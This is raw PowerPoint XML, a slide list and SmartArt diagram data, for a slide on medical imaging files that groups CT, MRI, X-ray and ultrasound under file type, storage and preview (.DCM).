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1979422356" r:id="rId3"/>
    <p:sldId id="258" r:id="rId4"/>
    <p:sldId id="259" r:id="rId5"/>
    <p:sldId id="260" r:id="rId6"/>
    <p:sldId id="261" r:id="rId7"/>
    <p:sldId id="264" r:id="rId8"/>
    <p:sldId id="262" r:id="rId9"/>
    <p:sldId id="1979422382" r:id="rId10"/>
    <p:sldId id="267" r:id="rId11"/>
    <p:sldId id="266" r:id="rId12"/>
    <p:sldId id="268" r:id="rId13"/>
    <p:sldId id="270" r:id="rId14"/>
    <p:sldId id="273" r:id="rId15"/>
    <p:sldId id="272" r:id="rId16"/>
    <p:sldId id="274" r:id="rId17"/>
    <p:sldId id="275" r:id="rId18"/>
    <p:sldId id="278" r:id="rId19"/>
    <p:sldId id="276" r:id="rId20"/>
    <p:sldId id="277" r:id="rId21"/>
    <p:sldId id="1979422375" r:id="rId22"/>
    <p:sldId id="1979422365" r:id="rId23"/>
    <p:sldId id="1979422380" r:id="rId24"/>
    <p:sldId id="1979422376" r:id="rId25"/>
    <p:sldId id="1979422384" r:id="rId26"/>
    <p:sldId id="1979422379" r:id="rId27"/>
    <p:sldId id="286" r:id="rId28"/>
    <p:sldId id="280" r:id="rId29"/>
    <p:sldId id="1979422381" r:id="rId30"/>
    <p:sldId id="281" r:id="rId31"/>
    <p:sldId id="282" r:id="rId32"/>
    <p:sldId id="283" r:id="rId33"/>
    <p:sldId id="1979422383" r:id="rId34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980F1-3FBE-A141-AA65-5CE26479F8A9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11E395-56EC-F948-A4F2-76013279959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chemeClr val="bg1"/>
              </a:solidFill>
            </a:rPr>
            <a:t>File type</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{35646B4D-6B57-1F4C-A6F3-DA34C470DC7E}" type="parTrans" cxnId="{5662B10C-475B-A741-B21B-30E940C069A5}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-GB"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{D544A134-690D-544C-82D4-785CA3F79597}" type="sibTrans" cxnId="{5662B10C-475B-A741-B21B-30E940C069A5}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-GB"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{F9A5DA4C-6DE8-CB4F-B113-5E6A7D9139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solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:rPr>
            <a:t>CT</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{C30C0CBD-97E9-8B40-94E7-E6D690E50B9E}" type="parTrans" cxnId="{F8325047-FECB-F940-80A7-FB5064B91C33}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-GB"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{1F1A1F92-2BD0-4C47-9430-40A9762968BD}" type="sibTrans" cxnId="{F8325047-FECB-F940-80A7-FB5064B91C33}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-GB"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{605AD3F3-ECF6-EC44-A1B4-69315BC1914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solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:rPr>
            <a:t>MRI</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{D8AF4918-3A7B-7348-9048-0DACF443E86B}" type="parTrans" cxnId="{85381914-2D6F-DB4E-B806-8AE6CD7F71B3}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-GB"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{73CDCD62-0AC4-C446-BB5C-16FB6073B312}" type="sibTrans" cxnId="{85381914-2D6F-DB4E-B806-8AE6CD7F71B3}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-GB"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{34726148-AFA5-3947-8031-340D57EFD1CF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chemeClr val="bg1"/>
              </a:solidFill>
            </a:rPr>
            <a:t>Storage</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{31EE85AD-2966-9D4E-9213-C260CA3B9B2F}" type="parTrans" cxnId="{C9E1E10D-1A19-C94B-9233-58BC21BFC49B}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-GB"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{49CB1281-59B7-934C-8F8A-E845FDED81CF}" type="sibTrans" cxnId="{C9E1E10D-1A19-C94B-9233-58BC21BFC49B}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-GB"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{02BCC555-8C51-C24F-9980-E188D8B3ED6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Managing Medical Information </a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{78E18C16-59AC-404A-BF20-73B78CB05A4D}" type="parTrans" cxnId="{55860A96-49DF-9C42-B9EC-062029E4C928}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-GB"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{BB49EAF3-85B5-E442-A267-08ED1D29B389}" type="sibTrans" cxnId="{55860A96-49DF-9C42-B9EC-062029E4C928}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-GB"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{FDF7AEB1-F9BB-9641-B47B-3F6A83211948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chemeClr val="bg1"/>
              </a:solidFill>
            </a:rPr>
            <a:t>Preview</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-GB" dirty="0"/>
            <a:t> </a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{4877FB75-B28F-534C-9B05-01B339AB6F5C}" type="parTrans" cxnId="{1F515D96-4614-8144-B07C-2081AC637F7C}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-GB"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{BEA1C5C3-45D2-DF49-95E3-21D1FC322122}" type="sibTrans" cxnId="{1F515D96-4614-8144-B07C-2081AC637F7C}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-GB"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{DEE3DE49-5AE1-C944-B970-646CE2B9B4B7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.DCM</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{47F6FEC6-24B9-1A40-A02A-3ADC019F66D0}" type="parTrans" cxnId="{19BDAF67-6641-044E-B8AD-E8F34E6D6DF3}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-GB"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{46817095-CADC-FF4B-BCE6-753EA0438431}" type="sibTrans" cxnId="{19BDAF67-6641-044E-B8AD-E8F34E6D6DF3}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-GB"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{EFBEEB23-FAE7-1141-9A85-6BBB3E72D3C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solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:rPr>
            <a:t>X-RAY</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{C6166212-6932-D54D-98BE-122EB7363B81}" type="parTrans" cxnId="{E3567D30-6602-B14D-A10F-FF521615409E}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-GB"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{8C1D3C28-B688-C440-8729-849B97BB6603}" type="sibTrans" cxnId="{E3567D30-6602-B14D-A10F-FF521615409E}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-GB"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{7A805812-88D7-F64F-8B02-49A3C70FCE9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solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:rPr>
            <a:t>ULTRA SOUND </a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{5B4EF681-91E0-554C-B432-2300FBE9F21D}" type="parTrans" cxnId="{B4D8B45D-2812-0143-B3D9-9D89BA859C94}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-GB"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{95B8D6E9-B55E-084A-B42B-B6FD16934783}" type="sibTrans" cxnId="{B4D8B45D-2812-0143-B3D9-9D89BA859C94}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-GB"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{D24BB46B-D0A9-1D4C-883E-807D4AB5DC6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Yet another file extension </a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{E71F9D02-F083-0540-B82F-76F1DF9B1629}" type="parTrans" cxnId="{63E29573-9E0C-DB49-ABA2-0DBEFB780BB8}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-GB"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{4F64DFBA-60D8-6443-87B5-3CF80C10F07C}" type="sibTrans" cxnId="{63E29573-9E0C-DB49-ABA2-0DBEFB780BB8}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-GB"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{AF867713-FCCB-4BB6-A4A7-8BC925B08E49}" type="pres">
      <dgm:prSet presAssocID="{74C980F1-3FBE-A141-AA65-5CE26479F8A9}" presName="root" presStyleCnt="0">
        <dgm:presLayoutVars>
          <dgm:dir/>
          <dgm:resizeHandles val="exact"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{8E4F4CBE-610C-444E-928C-E0EB7E1358AA}" type="pres">
      <dgm:prSet presAssocID="{0711E395-56EC-F948-A4F2-760132799599}" presName="compNode" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{63ADB4D1-47C4-434E-ADF5-EE7E61BBA462}" type="pres">
      <dgm:prSet presAssocID="{0711E395-56EC-F948-A4F2-76013279959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5630CEF8-A0EE-455F-B071-55A69815FDD2}" type="pres">
      <dgm:prSet presAssocID="{0711E395-56EC-F948-A4F2-760132799599}" presName="iconSpace" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{157BF98B-94C1-44F7-9991-DEF0A19D7E16}" type="pres">
      <dgm:prSet presAssocID="{0711E395-56EC-F948-A4F2-760132799599}" presName="parTx" presStyleLbl="revTx" presStyleIdx="0" presStyleCnt="6">
        <dgm:presLayoutVars>
          <dgm:chMax val="0"/>
          <dgm:chPref val="0"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{2A7BEDE1-F417-4CD5-8E1B-B675F4F2579E}" type="pres">
      <dgm:prSet presAssocID="{0711E395-56EC-F948-A4F2-760132799599}" presName="txSpace" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{55EF5413-E90E-4289-9DFA-5165AD6FC8B4}" type="pres">
      <dgm:prSet presAssocID="{0711E395-56EC-F948-A4F2-760132799599}" presName="desTx" presStyleLbl="revTx" presStyleIdx="1" presStyleCnt="6">
        <dgm:presLayoutVars/>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{F2FF69ED-B014-4762-AF1B-6BFF35C521A8}" type="pres">
      <dgm:prSet presAssocID="{D544A134-690D-544C-82D4-785CA3F79597}" presName="sibTrans" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{C1A3C3BD-2DDC-4D0B-B619-20BD23965E9A}" type="pres">
      <dgm:prSet presAssocID="{34726148-AFA5-3947-8031-340D57EFD1CF}" presName="compNode" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{58692E8B-7EF3-47FE-9DD8-0EFC24A000CC}" type="pres">
      <dgm:prSet presAssocID="{34726148-AFA5-3947-8031-340D57EFD1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EDDBB17-3533-4191-A46F-FD55FC71385D}" type="pres">
      <dgm:prSet presAssocID="{34726148-AFA5-3947-8031-340D57EFD1CF}" presName="iconSpace" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{C9750565-B9A4-4953-B745-7E757A5A4D75}" type="pres">
      <dgm:prSet presAssocID="{34726148-AFA5-3947-8031-340D57EFD1CF}" presName="parTx" presStyleLbl="revTx" presStyleIdx="2" presStyleCnt="6">
        <dgm:presLayoutVars>
          <dgm:chMax val="0"/>
          <dgm:chPref val="0"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{7C702D4A-805C-4709-9501-BF99C9CF1ECF}" type="pres">
      <dgm:prSet presAssocID="{34726148-AFA5-3947-8031-340D57EFD1CF}" presName="txSpace" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{42F53EE7-205C-4479-B7E7-30F375FF97F1}" type="pres">
      <dgm:prSet presAssocID="{34726148-AFA5-3947-8031-340D57EFD1CF}" presName="desTx" presStyleLbl="revTx" presStyleIdx="3" presStyleCnt="6">
        <dgm:presLayoutVars/>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{C24C16FA-473F-478C-840A-66A837482437}" type="pres">
      <dgm:prSet presAssocID="{49CB1281-59B7-934C-8F8A-E845FDED81CF}" presName="sibTrans" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{0383BB56-A8CD-462C-9EAD-A24B80CBDECC}" type="pres">
      <dgm:prSet presAssocID="{FDF7AEB1-F9BB-9641-B47B-3F6A83211948}" presName="compNode" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{54356A9D-49B1-4B54-98AE-7772723EB46D}" type="pres">
      <dgm:prSet presAssocID="{FDF7AEB1-F9BB-9641-B47B-3F6A832119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147EFA6-B33D-4886-97A4-28B4D5E8BC2C}" type="pres">
      <dgm:prSet presAssocID="{FDF7AEB1-F9BB-9641-B47B-3F6A83211948}" presName="iconSpace" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{332D4370-CC2C-44E3-8BEF-3B2727516FAF}" type="pres">
      <dgm:prSet presAssocID="{FDF7AEB1-F9BB-9641-B47B-3F6A83211948}" presName="parTx" presStyleLbl="revTx" presStyleIdx="4" presStyleCnt="6">
        <dgm:presLayoutVars>
          <dgm:chMax val="0"/>
          <dgm:chPref val="0"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{9EB46A9A-4460-4931-BDF8-2B7D0589900F}" type="pres">
      <dgm:prSet presAssocID="{FDF7AEB1-F9BB-9641-B47B-3F6A83211948}" presName="txSpace" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{E4BF76B1-A3B8-4822-8C23-4ECD5526BE8F}" type="pres">
      <dgm:prSet presAssocID="{FDF7AEB1-F9BB-9641-B47B-3F6A83211948}" presName="desTx" presStyleLbl="revTx" presStyleIdx="5" presStyleCnt="6">
        <dgm:presLayoutVars/>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
  </dgm:ptLst>
  <dgm:cxnLst>
    <dgm:cxn modelId="{5662B10C-475B-A741-B21B-30E940C069A5}" srcId="{74C980F1-3FBE-A141-AA65-5CE26479F8A9}" destId="{0711E395-56EC-F948-A4F2-760132799599}" srcOrd="0" destOrd="0" parTransId="{35646B4D-6B57-1F4C-A6F3-DA34C470DC7E}" sibTransId="{D544A134-690D-544C-82D4-785CA3F79597}"/>
    <dgm:cxn modelId="{C9E1E10D-1A19-C94B-9233-58BC21BFC49B}" srcId="{74C980F1-3FBE-A141-AA65-5CE26479F8A9}" destId="{34726148-AFA5-3947-8031-340D57EFD1CF}" srcOrd="1" destOrd="0" parTransId="{31EE85AD-2966-9D4E-9213-C260CA3B9B2F}" sibTransId="{49CB1281-59B7-934C-8F8A-E845FDED81CF}"/>
    <dgm:cxn modelId="{CBB57313-4301-B642-A7C8-23AD50C8FEF3}" type="presOf" srcId="{EFBEEB23-FAE7-1141-9A85-6BBB3E72D3CD}" destId="{55EF5413-E90E-4289-9DFA-5165AD6FC8B4}" srcOrd="0" destOrd="2" presId="urn:microsoft.com/office/officeart/2018/5/layout/CenteredIconLabelDescriptionList"/>
    <dgm:cxn modelId="{85381914-2D6F-DB4E-B806-8AE6CD7F71B3}" srcId="{0711E395-56EC-F948-A4F2-760132799599}" destId="{605AD3F3-ECF6-EC44-A1B4-69315BC19149}" srcOrd="1" destOrd="0" parTransId="{D8AF4918-3A7B-7348-9048-0DACF443E86B}" sibTransId="{73CDCD62-0AC4-C446-BB5C-16FB6073B312}"/>
    <dgm:cxn modelId="{563A531D-31C3-F847-A3D2-902416EC19A0}" type="presOf" srcId="{7A805812-88D7-F64F-8B02-49A3C70FCE9B}" destId="{55EF5413-E90E-4289-9DFA-5165AD6FC8B4}" srcOrd="0" destOrd="3" presId="urn:microsoft.com/office/officeart/2018/5/layout/CenteredIconLabelDescriptionList"/>
    <dgm:cxn modelId="{CAF0D223-105E-2E41-9A08-21BB8E139FCE}" type="presOf" srcId="{D24BB46B-D0A9-1D4C-883E-807D4AB5DC63}" destId="{E4BF76B1-A3B8-4822-8C23-4ECD5526BE8F}" srcOrd="0" destOrd="1" presId="urn:microsoft.com/office/officeart/2018/5/layout/CenteredIconLabelDescriptionList"/>
    <dgm:cxn modelId="{E3567D30-6602-B14D-A10F-FF521615409E}" srcId="{0711E395-56EC-F948-A4F2-760132799599}" destId="{EFBEEB23-FAE7-1141-9A85-6BBB3E72D3CD}" srcOrd="2" destOrd="0" parTransId="{C6166212-6932-D54D-98BE-122EB7363B81}" sibTransId="{8C1D3C28-B688-C440-8729-849B97BB6603}"/>
    <dgm:cxn modelId="{41DFD43A-38E7-1E42-8D60-6DDB27A4DEF4}" type="presOf" srcId="{F9A5DA4C-6DE8-CB4F-B113-5E6A7D913996}" destId="{55EF5413-E90E-4289-9DFA-5165AD6FC8B4}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/5/layout/CenteredIconLabelDescriptionList"/>
    <dgm:cxn modelId="{FC862B42-D7BF-C544-959E-ABA6EE0560A5}" type="presOf" srcId="{FDF7AEB1-F9BB-9641-B47B-3F6A83211948}" destId="{332D4370-CC2C-44E3-8BEF-3B2727516FAF}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/5/layout/CenteredIconLabelDescriptionList"/>
    <dgm:cxn modelId="{F8325047-FECB-F940-80A7-FB5064B91C33}" srcId="{0711E395-56EC-F948-A4F2-760132799599}" destId="{F9A5DA4C-6DE8-CB4F-B113-5E6A7D913996}" srcOrd="0" destOrd="0" parTransId="{C30C0CBD-97E9-8B40-94E7-E6D690E50B9E}" sibTransId="{1F1A1F92-2BD0-4C47-9430-40A9762968BD}"/>
    <dgm:cxn modelId="{B4D8B45D-2812-0143-B3D9-9D89BA859C94}" srcId="{0711E395-56EC-F948-A4F2-760132799599}" destId="{7A805812-88D7-F64F-8B02-49A3C70FCE9B}" srcOrd="3" destOrd="0" parTransId="{5B4EF681-91E0-554C-B432-2300FBE9F21D}" sibTransId="{95B8D6E9-B55E-084A-B42B-B6FD16934783}"/>
    <dgm:cxn modelId="{19BDAF67-6641-044E-B8AD-E8F34E6D6DF3}" srcId="{FDF7AEB1-F9BB-9641-B47B-3F6A83211948}" destId="{DEE3DE49-5AE1-C944-B970-646CE2B9B4B7}" srcOrd="0" destOrd="0" parTransId="{47F6FEC6-24B9-1A40-A02A-3ADC019F66D0}" sibTransId="{46817095-CADC-FF4B-BCE6-753EA0438431}"/>
    <dgm:cxn modelId="{63E29573-9E0C-DB49-ABA2-0DBEFB780BB8}" srcId="{FDF7AEB1-F9BB-9641-B47B-3F6A83211948}" destId="{D24BB46B-D0A9-1D4C-883E-807D4AB5DC63}" srcOrd="1" destOrd="0" parTransId="{E71F9D02-F083-0540-B82F-76F1DF9B1629}" sibTransId="{4F64DFBA-60D8-6443-87B5-3CF80C10F07C}"/>
    <dgm:cxn modelId="{D7B6BE80-52C1-CA43-A615-36B202F65B6C}" type="presOf" srcId="{0711E395-56EC-F948-A4F2-760132799599}" destId="{157BF98B-94C1-44F7-9991-DEF0A19D7E16}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/5/layout/CenteredIconLabelDescriptionList"/>
    <dgm:cxn modelId="{BF579E90-6F09-6E43-8C5F-F6EBEE0DC232}" type="presOf" srcId="{74C980F1-3FBE-A141-AA65-5CE26479F8A9}" destId="{AF867713-FCCB-4BB6-A4A7-8BC925B08E49}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/5/layout/CenteredIconLabelDescriptionList"/>
    <dgm:cxn modelId="{55860A96-49DF-9C42-B9EC-062029E4C928}" srcId="{34726148-AFA5-3947-8031-340D57EFD1CF}" destId="{02BCC555-8C51-C24F-9980-E188D8B3ED69}" srcOrd="0" destOrd="0" parTransId="{78E18C16-59AC-404A-BF20-73B78CB05A4D}" sibTransId="{BB49EAF3-85B5-E442-A267-08ED1D29B389}"/>
    <dgm:cxn modelId="{1F515D96-4614-8144-B07C-2081AC637F7C}" srcId="{74C980F1-3FBE-A141-AA65-5CE26479F8A9}" destId="{FDF7AEB1-F9BB-9641-B47B-3F6A83211948}" srcOrd="2" destOrd="0" parTransId="{4877FB75-B28F-534C-9B05-01B339AB6F5C}" sibTransId="{BEA1C5C3-45D2-DF49-95E3-21D1FC322122}"/>
    <dgm:cxn modelId="{369299A0-1CD6-A04E-BBA4-1F603906D0BD}" type="presOf" srcId="{DEE3DE49-5AE1-C944-B970-646CE2B9B4B7}" destId="{E4BF76B1-A3B8-4822-8C23-4ECD5526BE8F}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/5/layout/CenteredIconLabelDescriptionList"/>
    <dgm:cxn modelId="{5039D6C0-B755-6449-86C7-C736CB330670}" type="presOf" srcId="{02BCC555-8C51-C24F-9980-E188D8B3ED69}" destId="{42F53EE7-205C-4479-B7E7-30F375FF97F1}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/5/layout/CenteredIconLabelDescriptionList"/>
    <dgm:cxn modelId="{451CEFD1-1FF4-594A-87A5-8E25FE9427EB}" type="presOf" srcId="{34726148-AFA5-3947-8031-340D57EFD1CF}" destId="{C9750565-B9A4-4953-B745-7E757A5A4D75}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/5/layout/CenteredIconLabelDescriptionList"/>
    <dgm:cxn modelId="{D8A74CE1-4835-A14F-ADC0-5A03A727705C}" type="presOf" srcId="{605AD3F3-ECF6-EC44-A1B4-69315BC19149}" destId="{55EF5413-E90E-4289-9DFA-5165AD6FC8B4}" srcOrd="0" destOrd="1" presId="urn:microsoft.com/office/officeart/2018/5/layout/CenteredIconLabelDescriptionList"/>
    <dgm:cxn modelId="{854AA8AF-2098-9847-9059-3B909847FD7A}" type="presParOf" srcId="{AF867713-FCCB-4BB6-A4A7-8BC925B08E49}" destId="{8E4F4CBE-610C-444E-928C-E0EB7E1358AA}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/5/layout/CenteredIconLabelDescriptionList"/>
    <dgm:cxn modelId="{373A8063-A09E-8D48-A7E2-9564570886D5}" type="presParOf" srcId="{8E4F4CBE-610C-444E-928C-E0EB7E1358AA}" destId="{63ADB4D1-47C4-434E-ADF5-EE7E61BBA462}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/5/layout/CenteredIconLabelDescriptionList"/>
    <dgm:cxn modelId="{F4E430A3-D180-174F-8AA7-6FDEF1F390A5}" type="presParOf" srcId="{8E4F4CBE-610C-444E-928C-E0EB7E1358AA}" destId="{5630CEF8-A0EE-455F-B071-55A69815FDD2}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/5/layout/CenteredIconLabelDescriptionList"/>
    <dgm:cxn modelId="{568EFFFB-4238-F54C-A7FC-3B5C7BEC75BF}" type="presParOf" srcId="{8E4F4CBE-610C-444E-928C-E0EB7E1358AA}" destId="{157BF98B-94C1-44F7-9991-DEF0A19D7E16}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/5/layout/CenteredIconLabelDescriptionList"/>
    <dgm:cxn modelId="{A74AB5E2-80F5-F24D-9919-BBCB5C8B4A71}" type="presParOf" srcId="{8E4F4CBE-610C-444E-928C-E0EB7E1358AA}" destId="{2A7BEDE1-F417-4CD5-8E1B-B675F4F2579E}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/5/layout/CenteredIconLabelDescriptionList"/>
    <dgm:cxn modelId="{D65C9618-4F6F-2A46-AF5C-88FDE7791D35}" type="presParOf" srcId="{8E4F4CBE-610C-444E-928C-E0EB7E1358AA}" destId="{55EF5413-E90E-4289-9DFA-5165AD6FC8B4}" srcOrd="4" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/5/layout/CenteredIconLabelDescriptionList"/>
    <dgm:cxn modelId="{00EFF776-CF61-3348-A5DC-7E539DBF4A1C}" type="presParOf" srcId="{AF867713-FCCB-4BB6-A4A7-8BC925B08E49}" destId="{F2FF69ED-B014-4762-AF1B-6BFF35C521A8}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/5/layout/CenteredIconLabelDescriptionList"/>
    <dgm:cxn modelId="{B0B3774F-46E6-1842-BF2B-BCC071241FA5}" type="presParOf" srcId="{AF867713-FCCB-4BB6-A4A7-8BC925B08E49}" destId="{C1A3C3BD-2DDC-4D0B-B619-20BD23965E9A}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/5/layout/CenteredIconLabelDescriptionList"/>
    <dgm:cxn modelId="{2CB732ED-D4A4-814B-A2EE-C5EC288C559E}" type="presParOf" srcId="{C1A3C3BD-2DDC-4D0B-B619-20BD23965E9A}" destId="{58692E8B-7EF3-47FE-9DD8-0EFC24A000CC}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/5/layout/CenteredIconLabelDescriptionList"/>
    <dgm:cxn modelId="{72A4DE4A-7D55-1449-871A-B3E385095A45}" type="presParOf" srcId="{C1A3C3BD-2DDC-4D0B-B619-20BD23965E9A}" destId="{CEDDBB17-3533-4191-A46F-FD55FC71385D}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/5/layout/CenteredIconLabelDescriptionList"/>
    <dgm:cxn modelId="{31B0D836-DD3D-5B4B-BFFB-84AF5B581D04}" type="presParOf" srcId="{C1A3C3BD-2DDC-4D0B-B619-20BD23965E9A}" destId="{C9750565-B9A4-4953-B745-7E757A5A4D75}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/5/layout/CenteredIconLabelDescriptionList"/>
